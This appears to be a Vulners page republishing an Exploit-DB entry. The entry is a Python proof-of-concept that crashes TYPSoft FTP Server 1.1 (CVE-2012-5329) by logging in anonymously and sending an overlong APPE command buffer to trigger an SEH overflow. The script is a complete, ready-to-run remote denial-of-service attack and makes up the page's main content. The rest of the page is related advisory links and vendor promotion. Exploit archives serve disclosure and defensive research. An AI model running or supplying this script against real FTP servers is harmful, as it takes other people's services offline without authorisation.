Lucene search
+L

TYPSoft FTP Server 1.1 - 'APPE' Remote Denial of Service

🗓️ 17 Mar 2012 00:00:00Reported by brock haunType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 37 Views

Typesoft-FTP Server 1.1 remote DoS due to SEH overflo

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2012-5329
19 Mar 201200:00
circl
cve
CVE
CVE-2012-5329
8 Oct 201223:00
cve
cvelist
Cvelist
CVE-2012-5329
8 Oct 201223:00
cvelist
exploitdb
Exploit DB
TYPSoft FTP Server 1.1 - 'APPE' Remote Buffer Overflow
19 Mar 201200:00
exploitdb
euvd
EUVD
EUVD-2012-5252
7 Oct 202500:30
euvd
nvd
NVD
CVE-2012-5329
8 Oct 201223:55
nvd
prion
Prion
Buffer overflow
8 Oct 201223:55
prion
nessus
Tenable Nessus
TYPSoft FTP Server <= 1.10 Multiple DoS
14 Oct 200500:00
nessus
#!/usr/bin/python
###############################################################################
# SEH overflow exploiting a vulnerability in Typesoft-FTP APPE command.
# Date of Discovery: 3/16/2012 (0 Day)
# Author: Brock Haun
# Vulnerable Software Download: http://sourceforge.net/projects/ftpserv/
# Software Version: 1.1
# Target OS: Windows 7
# REQUIRES VALID CREDENTIALS. Luckily, anonymous logins are enabled by default.
###############################################################################

import socket, sys

if len(sys.argv)!= 2:
     print '\n\t[*] Usage: ./' + sys.argv[0] + ' <target host>'
     sys.exit(1)

print '\n\t[*] TypesoftFTP Server 1.1 Remote DoS (APPE) by Brock Haun'

host = sys.argv[1]

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)


buffer = 'A../' + '\x41' *100

print '\n\t[*] Sending crash buffer ("A../ + \x41 * 100").'

s.connect((host,21))

data = s.recv(1024)

s.send('USER anonymous' + '\r\n')

data = s.recv(1024)

s.send('PASS anonymous' + '\r\n')

data = s.recv(1024)

s.send('APPE ' + buffer + '\r\n')

print '\n\t[*] Done! Target should be unresponsive!'

s.close()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Sep 2016 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 24
EPSS0.0877
37